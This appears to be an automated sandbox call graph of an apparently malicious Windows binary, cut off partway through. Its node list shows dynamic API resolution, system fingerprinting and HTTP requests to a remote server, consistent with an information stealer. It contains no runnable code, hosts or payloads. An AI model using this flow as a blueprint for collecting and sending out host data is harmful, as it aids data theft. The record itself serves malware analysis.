API calls 14075->14076 14077 c43bcc 14076->14077 14078 c445c0 2 API calls 14077->14078 14079 c43be5 14078->14079 14080 c445c0 2 API calls 14079->14080 14081 c43bfe 14080->14081 14082 c445c0 2 API calls 14081->14082 14083 c43c17 14082->14083 14084 c445c0 2 API calls 14083->14084 14085 c43c30 14084->14085 14086 c445c0 2 API calls 14085->14086 14087 c43c49 14086->14087 14088 c445c0 2 API calls 14087->14088 14089 c43c62 14088->14089 14090 c445c0 2 API calls 14089->14090 14091 c43c7b 14090->14091 14092 c445c0 2 API calls 14091->14092 14093 c43c94 14092->14093 14094 c445c0 2 API calls 14093->14094 14095 c43cad 14094->14095 14096 c445c0 2 API calls 14095->14096 14097 c43cc6 14096->14097 14098 c445c0 2 API calls 14097->14098 14099 c43cdf 14098->14099 14100 c445c0 2 API calls 14099->14100 14101 c43cf8 14100->14101 14102 c445c0 2 API calls 14101->14102 14103 c43d11 14102->14103 14104 c445c0 2 API calls 14103->14104 14105 c43d2a 14104->14105 14106 c445c0 2 API calls 14105->14106 14107 c43d43 14106->14107 14108 c445c0 2 API calls 14107->14108 14109 c43d5c 14108->14109 14110 c445c0 2 API calls 14109->14110 14111 c43d75 14110->14111 14112 c445c0 2 API calls 14111->14112 14113 c43d8e 14112->14113 14114 c445c0 2 API calls 14113->14114 14115 c43da7 14114->14115 14116 c445c0 2 API calls 14115->14116 14117 c43dc0 14116->14117 14118 c445c0 2 API calls 14117->14118 14119 c43dd9 14118->14119 14120 c445c0 2 API calls 14119->14120 14121 c43df2 14120->14121 14122 c445c0 2 API calls 14121->14122 14123 c43e0b 14122->14123 14124 c445c0 2 API calls 14123->14124 14125 c43e24 14124->14125 14126 c445c0 2 API calls 14125->14126 14127 c43e3d 14126->14127 14128 c445c0 2 API calls 14127->14128 14129 c43e56 14128->14129 14130 c445c0 2 API calls 14129->14130 14131 c43e6f 14130->14131 14132 c445c0 2 API calls 14131->14132 14133 c43e88 14132->14133 14134 c445c0 2 API calls 14133->14134 14135 c43ea1 14134->14135 14136 c445c0 2 API calls 14135->14136 14137 c43eba 14136->14137 14138 c445c0 2 API calls 14137->14138 14139 c43ed3 14138->14139 14140 c445c0 2 API calls 14139->14140 14141 c43eec 14140->14141 14142 c445c0 2 API calls 14141->14142 14143 c43f05 14142->14143 14144 c445c0 2 API calls 14143->14144 14145 c43f1e 14144->14145 14146 c445c0 2 API calls 14145->14146 14147 c43f37 14146->14147 14148 c445c0 2 API calls 14147->14148 14149 c43f50 14148->14149 14150 c445c0 2 API calls 14149->14150 14151 c43f69 14150->14151 14152 c445c0 2 API calls 14151->14152 14153 c43f82 14152->14153 14154 c445c0 2 API calls 14153->14154 14155 c43f9b 14154->14155 14156 c445c0 2 API calls 14155->14156 14157 c43fb4 14156->14157 14158 c445c0 2 API calls 14157->14158 14159 c43fcd 14158->14159 14160 c445c0 2 API calls 14159->14160 14161 c43fe6 14160->14161 14162 c445c0 2 API calls 14161->14162 14163 c43fff 14162->14163 14164 c445c0 2 API calls 14163->14164 14165 c44018 14164->14165 14166 c445c0 2 API calls 14165->14166 14167 c44031 14166->14167 14168 c445c0 2 API calls 14167->14168 14169 c4404a 14168->14169 14170 c445c0 2 API calls 14169->14170 14171 c44063 14170->14171 14172 c445c0 2 API calls 14171->14172 14173 c4407c 14172->14173 14174 c445c0 2 API calls 14173->14174 14175 c44095 14174->14175 14176 c445c0 2 API calls 14175->14176 14177 c440ae 14176->14177 14178 c445c0 2 API calls 14177->14178 14179 c440c7 14178->14179 14180 c445c0 2 API calls 14179->14180 14181 c440e0 14180->14181 14182 c445c0 2 API calls 14181->14182 14183 c440f9 14182->14183 14184 c445c0 2 API calls 14183->14184 14185 c44112 14184->14185 14186 c445c0 2 API calls 14185->14186 14187 c4412b 14186->14187 14188 c445c0 2 API calls 14187->14188 14189 c44144 14188->14189 14190 c445c0 2 API calls 14189->14190 14191 c4415d 14190->14191 14192 c445c0 2 API calls 14191->14192 14193 c44176 14192->14193 14194 c445c0 2 API calls 14193->14194 14195 c4418f 14194->14195 14196 c445c0 2 API calls 14195->14196 14197 c441a8 14196->14197 14198 c445c0 2 API calls 14197->14198 14199 c441c1 14198->14199 14200 c445c0 2 API calls 14199->14200 14201 c441da 14200->14201 14202 c445c0 2 API calls 14201->14202 14203 c441f3 14202->14203 14204 c445c0 2 API calls 14203->14204 14205 c4420c 14204->14205 14206 c445c0 2 API calls 14205->14206 14207 c44225 14206->14207 14208 c445c0 2 API calls 14207->14208 14209 c4423e 14208->14209 14210 c445c0 2 API calls 14209->14210 14211 c44257 14210->14211 14212 c445c0 2 API calls 14211->14212 14213 c44270 14212->14213 14214 c445c0 2 API calls 14213->14214 14215 c44289 14214->14215 14216 c445c0 2 API calls 14215->14216 14217 c442a2 14216->14217 14218 c445c0 2 API calls 14217->14218 14219 c442bb 14218->14219 14220 c445c0 2 API calls 14219->14220 14221 c442d4 14220->14221 14222 c445c0 2 API calls 14221->14222 14223 c442ed 14222->14223 14224 c445c0 2 API calls 14223->14224 14225 c44306 14224->14225 14226 c445c0 2 API calls 14225->14226 14227 c4431f 14226->14227 14228 c445c0 2 API calls 14227->14228 14229 c44338 14228->14229 14230 c445c0 2 API calls 14229->14230 14231 c44351 14230->14231 14232 c445c0 2 API calls 14231->14232 14233 c4436a 14232->14233 14234 c445c0 2 API calls 14233->14234 14235 c44383 14234->14235 14236 c445c0 2 API calls 14235->14236 14237 c4439c 14236->14237 14238 c445c0 2 API calls 14237->14238 14239 c443b5 14238->14239 14240 c445c0 2 API calls 14239->14240 14241 c443ce 14240->14241 14242 c445c0 2 API calls 14241->14242 14243 c443e7 14242->14243 14244 c445c0 2 API calls 14243->14244 14245 c44400 14244->14245 14246 c445c0 2 API calls 14245->14246 14247 c44419 14246->14247 14248 c445c0 2 API calls 14247->14248 14249 c44432 14248->14249 14250 c445c0 2 API calls 14249->14250 14251 c4444b 14250->14251 14252 c445c0 2 API calls 14251->14252 14253 c44464 14252->14253 14254 c445c0 2 API calls 14253->14254 14255 c4447d 14254->14255 14256 c445c0 2 API calls 14255->14256 14257 c44496 14256->14257 14258 c445c0 2 API calls 14257->14258 14259 c444af 14258->14259 14260 c445c0 2 API calls 14259->14260 14261 c444c8 14260->14261 14262 c445c0 2 API calls 14261->14262 14263 c444e1 14262->14263 14264 c445c0 2 API calls 14263->14264 14265 c444fa 14264->14265 14266 c445c0 2 API calls 14265->14266 14267 c44513 14266->14267 14268 c445c0 2 API calls 14267->14268 14269 c4452c 14268->14269 14270 c445c0 2 API calls 14269->14270 14271 c44545 14270->14271 14272 c445c0 2 API calls 14271->14272 14273 c4455e 14272->14273 14274 c445c0 2 API calls 14273->14274 14275 c44577 14274->14275 14276 c445c0 2 API calls 14275->14276 14277 c44590 14276->14277 14278 c445c0 2 API calls 14277->14278 14279 c445a9 14278->14279 14280 c59c10 14279->14280 14281 c5a036 8 API calls 14280->14281 14282 c59c20 43 API calls 14280->14282 14283 c5a146 14281->14283 14284 c5a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14281->14284 14282->14281 14285 c5a216 14283->14285 14286 c5a153 8 API calls 14283->14286 14284->14283 14287 c5a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14285->14287 14288 c5a298 14285->14288 14286->14285 14287->14288 14289 c5a2a5 6 API calls 14288->14289 14290 c5a337 14288->14290 14289->14290 14291 c5a344 9 API calls 14290->14291 14292 c5a41f 14290->14292 14291->14292 14293 c5a4a2 14292->14293 14294 c5a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14292->14294 14295 c5a4dc 14293->14295 14296 c5a4ab GetProcAddress GetProcAddress 14293->14296 14294->14293 14297 c5a515 14295->14297 14298 c5a4e5 GetProcAddress GetProcAddress 14295->14298 14296->14295 14299 c5a612 14297->14299 14300 c5a522 10 API calls 14297->14300 14298->14297 14301 c5a67d 14299->14301 14302 c5a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14299->14302 14300->14299 14303 c5a686 GetProcAddress 14301->14303 14304 c5a69e 14301->14304 14302->14301 14303->14304 14305 c5a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14304->14305 14306 c55ca3 14304->14306 14305->14306 14307 c41590 14306->14307 15428 c41670 14307->15428 14310 c5a7a0 lstrcpy 14311 c415b5 14310->14311 14312 c5a7a0 lstrcpy 14311->14312 14313 c415c7 14312->14313 14314 c5a7a0 lstrcpy 14313->14314 14315 c415d9 14314->14315 14316 c5a7a0 lstrcpy 14315->14316 14317 c41663 14316->14317 14318 c55510 14317->14318 14319 c55521 14318->14319 14320 c5a820 2 API calls 14319->14320 14321 c5552e 14320->14321 14322 c5a820 2 API calls 14321->14322 14323 c5553b 14322->14323 14324 c5a820 2 API calls 14323->14324 14325 c55548 14324->14325 14326 c5a740 lstrcpy 14325->14326 14327 c55555 14326->14327 14328 c5a740 lstrcpy 14327->14328 14329 c55562 14328->14329 14330 c5a740 lstrcpy 14329->14330 14331 c5556f 14330->14331 14332 c5a740 lstrcpy 14331->14332 14371 c5557c 14332->14371 14333 c552c0 25 API calls 14333->14371 14334 c551f0 20 API calls 14334->14371 14335 c55643 StrCmpCA 14335->14371 14336 c556a0 StrCmpCA 14337 c557dc 14336->14337 14336->14371 14338 c5a8a0 lstrcpy 14337->14338 14339 c557e8 14338->14339 14341 c5a820 2 API calls 14339->14341 14340 c5a820 lstrlen lstrcpy 14340->14371 14343 c557f6 14341->14343 14342 c55856 StrCmpCA 14344 c55991 14342->14344 14342->14371 14345 c5a820 2 API calls 14343->14345 14347 c5a8a0 lstrcpy 14344->14347 14346 c55805 14345->14346 14348 c41670 lstrcpy 14346->14348 14349 c5599d 14347->14349 14368 c55811 14348->14368 14350 c5a820 2 API calls 14349->14350 14352 c559ab 14350->14352 14351 c55a0b StrCmpCA 14354 c55a16 Sleep 14351->14354 14355 c55a28 14351->14355 14353 c5a820 2 API calls 14352->14353 14358 c559ba 14353->14358 14354->14371 14359 c5a8a0 lstrcpy 14355->14359 14356 c5a740 lstrcpy 14356->14371 14357 c5a7a0 lstrcpy 14357->14371 14360 c41670 lstrcpy 14358->14360 14361 c55a34 14359->14361 14360->14368 14362 c5a820 2 API calls 14361->14362 14363 c55a43 14362->14363 14364 c5a820 2 API calls 14363->14364 14365 c55a52 14364->14365 14367 c41670 lstrcpy 14365->14367 14366 c5578a StrCmpCA 14366->14371 14367->14368 14368->13425 14369 c5593f StrCmpCA 14369->14371 14370 c41590 lstrcpy 14370->14371 14371->14333 14371->14334 14371->14335 14371->14336 14371->14340 14371->14342 14371->14351 14371->14356 14371->14357 14371->14366 14371->14369 14371->14370 14372 c5a8a0 lstrcpy 14371->14372 14372->14371 14374 c57553 GetVolumeInformationA 14373->14374 14375 c5754c 14373->14375 14376 c57591 14374->14376 14375->14374 14377 c575fc GetProcessHeap RtlAllocateHeap 14376->14377 14378 c57619 14377->14378 14379 c57628 wsprintfA 14377->14379 14380 c5a740 lstrcpy 14378->14380 14381 c5a740 lstrcpy 14379->14381 14382 c55da7 14380->14382 14381->14382 14382->13446 14384 c5a7a0 lstrcpy 14383->14384 14385 c44899 14384->14385 15437 c447b0 14385->15437 14387 c448a5 14388 c5a740 lstrcpy 14387->14388 14389 c448d7 14388->14389 14390 c5a740 lstrcpy 14389->14390 14391 c448e4 14390->14391 14392 c5a740 lstrcpy 14391->14392 14393 c448f1 14392->14393 14394 c5a740 lstrcpy 14393->14394 14395 c448fe 14394->14395 14396 c5a740 lstrcpy 14395->14396 14397 c4490b InternetOpenA StrCmpCA 14396->14397 14398 c44944 14397->14398 14399 c44ecb InternetCloseHandle 14398->14399 15443 c58b60 14398->15443 14401 c44ee8 14399->14401 15458 c49ac0 CryptStringToBinaryA 14401->15458 14402 c44963 15451 c5a920 14402->15451 14405 c44976 14407 c5a8a0 lstrcpy 14405->14407 14412 c4497f 14407->14412 14408 c5a820 2 API calls 14409 c44f05 14408->14409 14411 c5a9b0 4 API calls 14409->14411 14410 c44f27 codecvt 14414 c5a7a0 lstrcpy 14410->14414 14413 c44f1b 14411->14413 14416 c5a9b0 4 API calls 14412->14416 14415 c5a8a0 lstrcpy 14413->14415 14427 c44f57 14414->14427 14415->14410 14417 c449a9 14416->14417 14418 c5a8a0 lstrcpy 14417->14418 14419 c449b2 14418->14419 14420 c5a9b0 4 API calls 14419->14420 14421 c449d1 14420->14421 14422 c5a8a0 lstrcpy 14421->14422 14423 c449da 14422->14423 14424 c5a920 3 API calls 14423->14424 14425 c449f8 14424->14425 14426 c5a8a0 lstrcpy 14425->14426 14428 c44a01 14426->14428 14427->13449 14429 c5a9b0 4 API calls 14428->14429 14430 c44a20 14429->14430 14431 c5a8a0 lstrcpy 14430->14431 14432 c44a29 14431->14432 14433 c5a9b0 4 API calls 14432->14433 14434 c44a48 14433->14434 14435 c5a8a0 lstrcpy 14434->14435 14436 c44a51 14435->14436 14437 c5a9b0 4 API calls 14436->14437 14438 c44a7d 14437->14438 14439 c5a920 3 API calls 14438->14439 14440 c44a84 14439->14440 14441 c5a8a0 lstrcpy 14440->14441 14442 c44a8d 14441->14442 14443 c44aa3 InternetConnectA 14442->14443 14443->14399 14444 c44ad3 HttpOpenRequestA 14443->14444 14446 c44ebe InternetCloseHandle 14444->14446 14447 c44b28 14444->14447 14446->14399 14448 c5a9b0 4 API calls 14447->14448 14449 c44b3c 14448->14449 14450 c5a8a0 lstrcpy 14449->14450 14451 c44b45 14450->14451 14452 c5a920 3 API calls 14451->14452 14453 c44b63 14452->14453 14454 c5a8a0 lstrcpy 14453->14454 14455 c44b6c 14454->14455 14456 c5a9b0 4 API calls 14455->14456 14457 c44b8b 14456->14457 14458 c5a8a0 lstrcpy 14457->14458 14459 c44b94 14458->14459 14460 c5a9b0 4 API calls 14459->14460 14461 c44bb5 14460->14461 14462 c5a8a0 lstrcpy 14461->14462 14463 c44bbe 14462->14463 14464 c5a9b0 4 API calls 14463->14464 14465 c44bde 14464->14465 14466 c5a8a0 lstrcpy 14465->14466 14467 c44be7 14466->14467 14468 c5a9b0 4 API calls 14467->14468 14469 c44c06 14468->14469 14470 c5a8a0 lstrcpy 14469->14470 14471 c44c0f 14470->14471 14472 c5a920 3 API calls 14471->14472 14473 c44c2d 14472->14473 14474 c5a8a0 lstrcpy 14473->14474 14475 c44c36 14474->14475 14476 c5a9b0 4 API calls 14475->14476 14477 c44c55 14476->14477 14478 c5a8a0 lstrcpy 14477->14478 14479 c44c5e 14478->14479 14480 c5a9b0 4 API calls 14479->14480 14481 c44c7d 14480->14481 14482 c5a8a0 lstrcpy 14481->14482 14483 c44c86 14482->14483 14484 c5a920 3 API calls 14483->14484 14485 c44ca4 14484->14485 14486 c5a8a0 lstrcpy 14485->14486 14487 c44cad 14486->14487 14488 c5a9b0 4 API calls 14487->14488 14489 c44ccc 14488->14489 14490 c5a8a0 lstrcpy 14489->14490 14491 c44cd5 14490->14491 14492 c5a9b0 4 API calls 14491->14492 14493 c44cf6 14492->14493 14494 c5a8a0 lstrcpy 14493->14494 14495 c44cff 14494->14495 14496 c5a9b0 4 API calls 14495->14496 14497 c44d1f 14496->14497 14498 c5a8a0 lstrcpy 14497->14498 14499 c44d28 14498->14499 14500 c5a9b0 4 API calls 14499->14500 14501 c44d47 14500->14501 14502 c5a8a0 lstrcpy 14501->14502 14503 c44d50 14502->14503 14504 c5a920 3 API calls 14503->14504 14505 c44d6e 14504->14505 14506 c5a8a0 lstrcpy 14505->14506 14507 c44d77 14506->14507 14508 c5a740 lstrcpy 14507->14508 14509 c44d92 14508->14509 14510 c5a920 3 API calls 14509->14510 14511 c44db3 14510->14511 14512 c5a920 3 API calls 14511->14512 14513 c44dba 14512->14513 14514 c5a8a0 lstrcpy 14513->14514 14515 c44dc6 14514->14515 14516 c44de7 lstrlen 14515->14516 14517 c44dfa 14516->14517 14518 c44e03 lstrlen 14517->14518 15457 c5aad0 14518->15457 14520 c44e13 HttpSendRequestA 14521 c44e32 InternetReadFile 14520->14521 14522 c44e67 InternetCloseHandle 14521->14522 14527 c44e5e 14521->14527 14524 c5a800 14522->14524 14524->14446 14525 c5a9b0 4 API calls 14525->14527 14526 c5a8a0 lstrcpy 14526->14527 14527->14521 14527->14522 14527->14525 14527->14526 15464 c5aad0 14528->15464 14530 c517c4 StrCmpCA 14531 c517cf ExitProcess 14530->14531 14543 c517d7 14530->14543 14532 c519c2 14532->13451 14533 c518ad StrCmpCA 14533->14543 14534 c518cf StrCmpCA 14534->14543 14535 c518f1 StrCmpCA 14535->14543 14536 c51951 StrCmpCA 14536->14543 14537 c51970 StrCmpCA 14537->14543 14538 c51913 StrCmpCA 14538->14543 14539 c51932 StrCmpCA 14539->14543 14540 c5185d StrCmpCA 14540->14543 14541 c5187f StrCmpCA 14541->14543 14542 c5a820 lstrlen lstrcpy 14542->14543 14543->14532 14543->14533 14543->14534 14543->14535 14543->14536 14543->14537 14543->14538 14543->14539 14543->14540 14543->14541 14543->14542 14545 c5a7a0 lstrcpy 14544->14545 14546 c45979 14545->14546 14547 c447b0 2 API calls 14546->14547 14548 c45985 14547->14548 14549 c5a740 lstrcpy 14548->14549 14550 c459ba 14549->14550 14551 c5a740 lstrcpy 14550->14551 14552 c459c7 14551->14552 14553 c5a740 lstrcpy 14552->14553 14554 c459d4 14553->14554 14555 c5a740 lstrcpy 14554->14555 14556 c459e1 14555->14556 14557 c5a740 lstrcpy 14556->14557 14558 c459ee InternetOpenA StrCmpCA 14557->14558 14559 c45a1d 14558->14559 14560 c45fc3 InternetCloseHandle 14559->14560 14561 c58b60 3 API calls 14559->14561 14562 c45fe0 14560->14562 14563 c45a3c 14561->14563 14565 c49ac0 4 API calls 14562->14565 14564 c5a920 3 API calls 14563->14564 14566 c45a4f 14564->14566 14567 c45fe6 14565->14567 14568 c5a8a0 lstrcpy 14566->14568 14569 c5a820 2 API calls 14567->14569 14572 c4601f codecvt 14567->14572 14574 c45a58 14568->14574 14570 c45ffd 14569->14570 14571 c5a9b0 4 API calls 14570->14571 14573 c46013 14571->14573 14576 c5a7a0 lstrcpy 14572->14576 14575 c5a8a0 lstrcpy 14573->14575 14577 c5a9b0 4 API calls 14574->14577 14575->14572 14585 c4604f 14576->14585 14578 c45a82 14577->14578 14579 c5a8a0 lstrcpy 14578->14579 14580 c45a8b 14579->14580 14581 c5a9b0 4 API calls 14580->14581 14582 c45aaa 14581->14582 14583 c5a8a0 lstrcpy 14582->14583 14584 c45ab3 14583->14584 14586 c5a920 3 API calls 14584->14586 14585->13457 14587 c45ad1 14586->14587 14588 c5a8a0 lstrcpy 14587->14588 14589 c45ada 14588->14589 14590 c5a9b0 4 API calls 14589->14590 14591 c45af9 14590->14591 14592 c5a8a0 lstrcpy 14591->14592 14593 c45b02 14592->14593 14594 c5a9b0 4 API calls 14593->14594 14595 c45b21 14594->14595 14596 c5a8a0 lstrcpy 14595->14596 14597 c45b2a 14596->14597 14598 c5a9b0 4 API calls 14597->14598 14599 c45b56 14598->14599 14600 c5a920 3 API calls 14599->14600 14601 c45b5d 14600->14601 14602 c5a8a0 lstrcpy 14601->14602 14603 c45b66 14602->14603 14604 c45b7c InternetConnectA 14603->14604 14604->14560 14605 c45bac HttpOpenRequestA 14604->14605 14607 c45fb6 InternetCloseHandle 14605->14607 14608 c45c0b 14605->14608 14607->14560 14609 c5a9b0 4 API calls 14608->14609 14610 c45c1f 14609->14610 14611 c5a8a0 lstrcpy 14610->14611 14612 c45c28 14611->14612 14613 c5a920 3 API calls 14612->14613 14614 c45c46 14613->14614 14615 c5a8a0 lstrcpy 14614->14615 14616 c45c4f 14615->14616 14617 c5a9b0 4 API calls 14616->14617 14618 c45c6e 14617->14618 14619 c5a8a0 lstrcpy 14618->14619 14620 c45c77 14619->14620 14621 c5a9b0 4 API calls 14620->14621 14622 c45c98 14621->14622 14623 c5a8a0 lstrcpy 14622->14623 14624 c45ca1 14623->14624 14625 c5a9b0 4 API calls 14624->14625 14626 c45cc1 14625->14626 14627 c5a8a0 lstrcpy 14626->14627 14628 c45cca 14627->14628 14629 c5a9b0 4 API calls 14628->14629 14630 c45ce9 14629->14630 14631 c5a8a0 lstrcpy 14630->14631 14632 c45cf2 14631->14632 14633 c5a920 3 API calls 14632->14633 14634 c45d10 14633->14634 14635 c5a8a0 lstrcpy 14634->14635 14636 c45d19 14635->14636 14637 c5a9b0 4 API calls 14636->14637 14638 c45d38 14637->14638 14639 c5a8a0 lstrcpy 14638->14639 14640 c45d41 14639->14640 14641 c5a9b0 4 API calls 14640->14641 14642 c45d60 14641->14642 14643 c5a8a0 lstrcpy 14642->14643 14644 c45d69 14643->14644 14645 c5a920 3 API calls 14644->14645 14646 c45d87 14645->14646 14647 c5a8a0 lstrcpy 14646->14647 14648 c45d90 14647->14648 14649 c5a9b0 4 API calls 14648->14649 14650 c45daf 14649->14650 14651 c5a8a0 lstrcpy 14650->14651 14652 c45db8 14651->14652 14653 c5a9b0 4 API calls 14652->14653 14654 c45dd9 14653->14654 14655 c5a8a0 lstrcpy 14654->14655 14656 c45de2 14655->14656 14657 c5a9b0 4 API calls 14656->14657 14658 c45e02 14657->14658 14659 c5a8a0 lstrcpy 14658->14659 14660 c45e0b 14659->14660 14661 c5a9b0 4 API calls 14660->14661 14662 c45e2a 14661->14662 14663 c5a8a0 lstrcpy 14662->14663 14664 c45e33 14663->14664 14665 c5a920 3 API calls 14664->14665 14666 c45e54 14665->14666 14667 c5a8a0 lstrcpy 14666->14667 14668 c45e5d 14667->14668 14669 c45e70 lstrlen 14668->14669 15465 c5aad0 14669->15465 14671 c45e81 lstrlen GetProcessHeap RtlAllocateHeap 15466 c5aad0 14671->15466 14673 c45eae lstrlen 14674 c45ebe 14673->14674 14675 c45ed7 lstrlen 14674->14675 14676 c45ee7 14675->14676 14677 c45ef0 lstrlen 14676->14677 14678 c45f03 14677->14678 14679 c45f1a lstrlen 14678->14679 15467 c5aad0 14679->15467 14681 c45f2a HttpSendRequestA 14682 c45f35 InternetReadFile 14681->14682 14683 c45f6a InternetCloseHandle 14682->14683 14687 c45f61 14682->14687 14683->14607 14685 c5a9b0 4 API calls 14685->14687 14686 c5a8a0 lstrcpy 14686->14687 14687->14682 14687->14683 14687->14685 14687->14686 14690 c51077 14688->14690 14689 c51151 14689->13459 14690->14689 14691 c5a820 lstrlen lstrcpy 14690->14691 14691->14690 14697 c50db7 14692->14697 14693 c50f17 14693->13467 14694 c50ea4 StrCmpCA 14694->14697 14695 c50e27 StrCmpCA 14695->14697 14696 c50e67 StrCmpCA 14696->14697 14697->14693 14697->14694 14697->14695 14697->14696 14698 c5a820 lstrlen lstrcpy 14697->14698 14698->14697 14701 c50f67 14699->14701 14700 c51044 14700->13475 14701->14700 14702 c50fb2 StrCmpCA 14701->14702 14703 c5a820 lstrlen lstrcpy 14701->14703 14702->14701 14703->14701 14705 c5a740 lstrcpy 14704->14705 14706 c51a26 14705->14706 14707 c5a9b0 4 API calls 14706->14707 14708 c51a37 14707->14708 14709 c5a8a0 lstrcpy 14708->14709 14710 c51a40 14709->14710 14711 c5a9b0 4 API calls 14710->14711 14712 c51a5b 14711->14712 14713 c5a8a0 lstrcpy 14712->14713 14714 c51a64 14713->14714 14715 c5a9b0 4 API calls 14714->14715 14716 c51a7d 14715->14716 14717 c5a8a0 lstrcpy 14716->14717 14718 c51a86 14717->14718 14719 c5a9b0 4 API calls 14718->14719 14720 c51aa1 14719->14720 14721 c5a8a0 lstrcpy 14720->14721 14722 c51aaa 14721->14722 14723 c5a9b0 4 API calls 14722->14723 14724 c51ac3 14723->14724 14725 c5a8a0 lstrcpy 14724->14725 14726 c51acc 14725->14726 14727 c5a9b0 4 API calls 14726->14727 14728 c51ae7 14727->14728 14729 c5a8a0 lstrcpy 14728->14729 14730 c51af0 14729->14730 14731 c5a9b0 4 API calls 14730->14731 14732 c51b09 14731->14732 14733 c5a8a0 lstrcpy 14732->14733 14734 c51b12 14733->14734 14735 c5a9b0 4 API calls 14734->14735 14736 c51b2d 14735->14736 14737 c5a8a0 lstrcpy 14736->14737 14738 c51b36 14737->14738 14739 c5a9b0 4 API calls 14738->14739 14740 c51b4f 14739->14740 14741 c5a8a0 lstrcpy 14740->14741 14742 c51b58 14741->14742 14743 c5a9b0 4 API calls 14742->14743 14744 c51b76 14743->14744 14745 c5a8a0 lstrcpy 14744->14745 14746 c51b7f 14745->14746 14747 c57500 6 API calls 14746->14747 14748 c51b96 14747->14748 14749 c5a920 3 API calls 14748->14749 14750 c51ba9 14749->14750 14751 c5a8a0 lstrcpy 14750->14751 14752 c51bb2 14751->14752 14753 c5a9b0 4 API calls 14752->14753 14754 c51bdc 14753->14754 14755 c5a8a0 lstrcpy 14754->14755 14756 c51be5 14755->14756 14757 c5a9b0 4 API calls 14756->14757 14758 c51c05 14757->14758 14759 c5a8a0 lstrcpy 14758->14759 14760 c51c0e 14759->14760 15468 c57690 GetProcessHeap RtlAllocateHeap 14760->15468 14763 c5a9b0 4 API calls 14764 c51c2e 14763->14764 14765 c5a8a0 lstrcpy 14764->14765 14766 c51c37 14765->14766 14767 c5a9b0 4 API calls 14766->14767 14768 c51c56 14767->14768 14769 c5a8a0 lstrcpy 14768->14769 14770 c51c5f 14769->14770 14771 c5a9b0 4 API calls 14770->14771 14772 c51c80 14771->14772 14773 c5a8a0 lstrcpy 14772->14773 14774 c51c89 14773->14774 15475 c577c0 GetCurrentProcess IsWow64Process 14774->15475 14777 c5a9b0 4 API calls 14778 c51ca9 14777->14778 14779 c5a8a0 lstrcpy 14778->14779 14780 c51cb2 14779->14780 14781 c5a9b0 4 API calls 14780->14781 14782 c51cd1 14781->14782 14783 c5a8a0 lstrcpy 14782->14783 14784 c51cda 14783->14784 14785 c5a9b0 4 API calls 14784->14785 14786 c51cfb 14785->14786 14787 c5a8a0 lstrcpy 14786->14787 14788 c51d04 14787->14788 14789 c57850 3 API calls 14788->14789 14790 c51d14 14789->14790 14791 c5a9b0 4 API calls 14790->14791 14792 c51d24 14791->14792 14793 c5a8a0 lstrcpy 14792->14793 14794 c51d2d 14793->14794 14795 c5a9b0 4 API calls 14794->14795 14796 c51d4c 14795->14796 14797 c5a8a0 lstrcpy 14796->14797 14798 c51d55 14797->14798 14799 c5a9b0 4 API calls 14798->14799 14800 c51d75 14799->14800 14801 c5a8a0 lstrcpy 14800->14801 14802 c51d7e 14801->14802 14803 c578e0 3 API calls 14802->14803 14804 c51d8e 14803->14804 14805 c5a9b0 4 API calls 14804->14805 14806 c51d9e 14805->14806 14807 c5a8a0 lstrcpy 14806->14807 14808 c51da7 14807->14808 14809 c5a9b0 4 API calls 14808->14809 14810 c51dc6 14809->14810 14811 c5a8a0 lstrcpy 14810->14811 14812 c51dcf 14811->14812 14813 c5a9b0 4 API calls 14812->14813 14814 c51df0 14813->14814 14815 c5a8a0 lstrcpy 14814->14815 14816 c51df9 14815->14816 15477 c57980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14816->15477 14819 c5a9b0 4 API calls 14820 c51e19 14819->14820 14821 c5a8a0 lstrcpy 14820->14821 14822 c51e22 14821->14822 14823 c5a9b0 4 API calls 14822->14823 14824 c51e41 14823->14824 14825 c5a8a0 lstrcpy 14824->14825 14826 c51e4a 14825->14826 14827 c5a9b0 4 API calls 14826->14827 14828 c51e6b 14827->14828 14829 c5a8a0 lstrcpy 14828->14829 14830 c51e74 14829->14830 15479 c57a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14830->15479 14833 c5a9b0 4 API calls 14834 c51e94 14833->14834 14835 c5a8a0 lstrcpy 14834->14835 14836 c51e9d 14835->14836 14837 c5a9b0 4 API calls 14836->14837 14838 c51ebc 14837->14838 14839 c5a8a0 lstrcpy 14838->14839 14840 c51ec5 14839->14840 14841 c5a9b0 4 API calls 14840->14841 14842 c51ee5 14841->14842 14843 c5a8a0 lstrcpy 14842->14843 14844 c51eee 14843->14844 15482 c57b00 GetUserDefaultLocaleName 14844->15482 14847 c5a9b0 4 API calls 14848 c51f0e 14847->14848 14849 c5a8a0 lstrcpy 14848->14849 14850 c51f17 14849->14850 14851 c5a9b0 4 API calls 14850->14851 14852 c51f36 14851->14852 14853 c5a8a0 lstrcpy 14852->14853 14854 c51f3f 14853->14854 14855 c5a9b0 4 API calls 14854->14855 14856 c51f60 14855->14856 14857 c5a8a0 lstrcpy 14856->14857 14858 c51f69 14857->14858 15486 c57b90 14858->15486 14860 c51f80 14861 c5a920 3 API calls 14860->14861 14862 c51f93 14861->14862 14863 c5a8a0 lstrcpy 14862->14863 14864 c51f9c 14863->14864 14865 c5a9b0 4 API calls 14864->14865 14866 c51fc6 14865->14866 14867 c5a8a0 lstrcpy 14866->14867 14868 c51fcf 14867->14868 14869 c5a9b0 4 API calls 14868->14869 14870 c51fef 14869->14870 14871 c5a8a0 lstrcpy 14870->14871 14872 c51ff8 14871->14872 15498 c57d80 GetSystemPowerStatus 14872->15498 14875 c5a9b0 4 API calls 14876 c52018 14875->14876 14877 c5a8a0 lstrcpy 14876->14877 14878 c52021 14877->14878 14879 c5a9b0 4 API calls 14878->14879 14880 c52040 14879->14880 14881 c5a8a0 lstrcpy 14880->14881 14882 c52049 14881->14882 14883 c5a9b0 4 API calls 14882->14883 14884 c5206a 14883->14884 14885 c5a8a0 lstrcpy 14884->14885 14886 c52073 14885->14886 14887 c5207e GetCurrentProcessId 14886->14887 15500 c59470 OpenProcess 14887->15500 14890 c5a920 3 API calls 14891 c520a4 14890->14891 14892 c5a8a0 lstrcpy 14891->14892 14893 c520ad 14892->14893 14894 c5a9b0 4 API calls 14893->14894 14895 c520d7 14894->14895 14896 c5a8a0 lstrcpy 14895->14896 14897 c520e0 